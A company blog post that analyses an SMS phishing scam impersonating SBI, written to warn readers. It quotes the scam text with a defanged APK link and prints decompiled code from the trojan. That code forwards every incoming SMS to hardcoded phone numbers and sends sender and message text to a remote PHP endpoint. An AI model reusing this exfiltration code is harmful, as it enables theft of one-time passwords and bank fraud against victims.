SBI Account Will be Suspended Today
Finally I too got the message from scammers.
You might face financial loss or scammed if the scammer got your details.
SBI (State Bank of India) or any other legitimate financial institution will never ask you to provide personal information, such as your PAN card details or account information, through an unsolicited message or email.
To be exact this is the message we received. This is a message from scammers urging us to install the application in the link provided.
Dear Customer your SBI Account Will be Suspended Today Please Update Your Pancard now visit the link install app https://sbl-1-kyc-app[.]web[.]app/SBl-KYC[.]apk
Only last week we informed our co-workers not to click on such links. Today I received it via SMS. And I was happy. Not to install but to know what the application to when installing it.
Let’s see what the scammers are trying to do when we install the application in the link.
First the link.
Looks like the scammers are using Firebase from Google to host the application and distribute the application(apk).
We did a quick reverse engineering and found the below.
<uses-sdk android:minSdkVersion="16" android:targetSdkVersion="33"/>
<uses-feature android:name="android.hardware.telephony" android:required="false"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_SMS"/>
First we had a look at the manifest file. It requested read and send SMS permission.
<receiver android:name="com.example.myapplication.SmsReceiver" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
<receiver android:name="com.example.myapplication.S1m2s3L4i5s6t7n8e9r0" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
Below that we found two Broadcast receiver registrations for SMS_RECEIVED. So they are listening for SMS we are receiving in our phone.
Lets dig further on each receivers.
if (obj2 != null) {
SmsMessage smsMessage = Build.VERSION.SDK_INT >= 23 ? SmsMessage.createFromPdu(bArr, (String) obj2) : null;
Intrinsics.checkExpressionValueIsNotNull(smsMessage, "currentMessage");
String string = sharedPreferences.getString("phoneNumber", "+916306015875");
sharedPreferences.getString("phoneNumber", "+917908459827");
sharedPreferences.getString("phoneNumber", "+918108060160");
sharedPreferences.getString("phoneNumber", "+917065860860");
sharedPreferences.getString("phoneNumber", "+917304499902");
sharedPreferences.getString("phoneNumber", "+919634224747");
sharedPreferences.getString("phoneNumber", "+919004676782");
String displayMessageBody = smsMessage.getDisplayMessageBody();
if (smsMessage.getMessageClass() != SmsMessage.MessageClass.CLASS_0) {
smsManager.sendTextMessage(string, null, displayMessageBody, null, null);
} else {
return;
}
}
Here is a brief explanation of what each line of code is doing:
- The first line declares a variable called
smsMessage
of typeSmsMessage
. This variable is assigned a value based on the Android version installed on the device. If the Android version is 23 or above, thecreateFromPdu
method is used to create aSmsMessage
object from a Protocol Data Unit (PDU) byte array (bArr
) and a String object (obj2
). If the Android version is below 23,smsMessage
is assigned a value ofnull
. - The
Intrinsics.checkExpressionValueIsNotNull
method is used to check thatsmsMessage
is not null. This is done to ensure that thegetDisplayMessageBody
method called later on the variable will not result in a NullPointerException. - The next few lines retrieve some phone numbers from shared preferences. The
getString
method is used to retrieve the values associated with the keys "phoneNumber" and some phone numbers are given as default values if the keys are not found. - The
getDisplayMessageBody
method is used to get the message body of thesmsMessage
object. - The
getMessageClass
method is used to determine the message class of thesmsMessage
object. If the message class is notSmsMessage.MessageClass.CLASS_0
, thesendTextMessage
method is called onsmsManager
to send a text message containing the message body (ie. SMS we received)(displayMessageBody
) to the phone number stored in thestring
variable. - If the message class is
SmsMessage.MessageClass.CLASS_0
, the method returns without sending any text message.
Let’s have a look at another receiver.
public void onReceive(Context context, Intent intent) {
try {
Bundle extras = intent.getExtras();
if (extras != null) {
for (Object obj : (Object[]) extras.get("pdus")) {
SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
String displayMessageBody = createFromPdu.getDisplayMessageBody();
Toast.makeText(context, "From: " + displayOriginatingAddress, 0).show();
sendSMS(context, displayOriginatingAddress, displayMessageBody);
}
}
} catch (Exception unused) {
Log.e("Error", "Failed to read SMS!");
}
}
public void sendSMS(Context context, String str, String str2) {
Volley.newRequestQueue(context).add(new StringRequest(0, ("https://stickiest-variety.000webhostapp.com//save_sms0.php?phone=" + str) + "&msg=" + Uri.encode(str2), new SmsReceiver$$ExternalSyntheticLambda0(), new SmsReceiver$$ExternalSyntheticLambda1()));
}
Here is a brief explanation of what each line of code is doing:
- The
onReceive
method is called when a new SMS is received. It gets the extras from the intent, which contain the SMS message data. If there are extras, it loops through each PDU and creates aSmsMessage
object from the PDU. It then gets the sender's phone number and the message body, shows a toast with the sender's phone number, and sends the message to a server using thesendSMS
method. - The
sendSMS
method uses the Volley library to send a HTTP GET request to a server. It encodes the message body using theUri.encode
method and appends it to the URL as a parameter named "msg". It also appends the sender's phone number to the URL as a parameter named "phone".
Based on the above findings, it seems that the scammers are intercepting the SMS and send it to their mobile number and one to their server.
Please do not click on the link or download any app from unverified sources.
This blog is only for informational purpose and to educate the people what this kind of applications do.
Stay tuned and follow us for more.😉
Written by
Naveen Sakthivel, CTO
Dotworld Technologies Private Limited
https://dotworld.in